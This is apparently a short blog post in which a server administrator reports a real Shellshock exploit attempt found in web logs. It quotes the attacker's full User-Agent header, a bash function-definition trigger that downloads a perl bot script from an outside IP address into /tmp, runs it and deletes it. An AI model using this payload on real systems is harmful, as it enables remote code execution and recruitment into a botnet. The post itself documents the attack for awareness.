My First Real Shellshock

Apart from a harmless backping immediately after the shellshock vulnerability became known, here’s now the first time that I noticed an actual exploit. (There may have been others that went unnoticed who might have just used some http headers). This one caused a 404 by accessing “/phppath/cgi_wrapper”, which we don’t have on our servers. So here’s the User-Agent string – have fun reading the perl script that it’s trying to download and execute:

() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESSX";system("wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl");'
This entry was posted in Software. Bookmark the permalink.

2 Responses to My First Real Shellshock

  1. Hunter Meriwether says:

    I just found your post on “Possible reasons for linker errors”, after beating my head for weeks trying to understand a cryptic LNK2019 error message. You’ve opened my eyes to “undname” and I’m forever in your debt. Thanks!

Comments are closed.